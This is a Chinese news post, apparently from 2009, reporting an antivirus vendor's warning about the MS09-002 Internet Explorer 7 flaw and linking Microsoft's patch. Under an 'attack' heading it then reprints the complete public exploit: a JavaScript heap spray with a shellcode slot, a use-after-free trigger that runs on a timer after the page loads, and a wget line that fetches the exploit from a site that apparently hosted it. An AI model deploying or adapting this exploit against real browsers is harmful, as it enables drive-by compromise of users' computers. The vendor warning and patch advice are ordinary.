卸载IE7恢复到IE6
通过Office 200
江民反病毒中心监测到,利用微软MS09-002漏洞的完整攻击代码被公布在互联网上,据了解,该漏洞存在于微软IE7浏览器中,如果用户没有及时修补该漏洞,当用户使用存在漏洞的IE7浏览器浏览网页时,一旦打开了被黑客恶意挂马的网页时,病毒就会利用该漏洞入侵到用户计算机中,给用户带来严重的损失。
据江民反病毒专家介绍,目前微软MS09-002漏洞还没有被大量用于网页挂马,但随着攻击代码被完全公布在互联网上,预计在未来的几天内就会被国内的黑客大面积利用,用于广泛的传播各种恶意软件。
江民反病毒专家提醒广大用户,微软公司已经于北京时间2月11日发布了针对此漏洞的安全更新程序,用户上网时务必及时修补微软MS09-002漏洞,以免受到病毒的侵害。与此同时,用户可以使用江民杀毒软件KV2009的漏洞检测工具,自动修补该漏洞。
[防]:
MS09-002漏洞补丁下载页面:
http://www.microsoft.com/china/technet/security/bulletin/MS09-002.mspx
[攻]:
Expolit源代码:
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"
took a little but found it. /str0ke
-->
<script language="JavaScript">
var c="putyourshizhere-unescaped";
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
# milw0rm.com [2009-02-18]
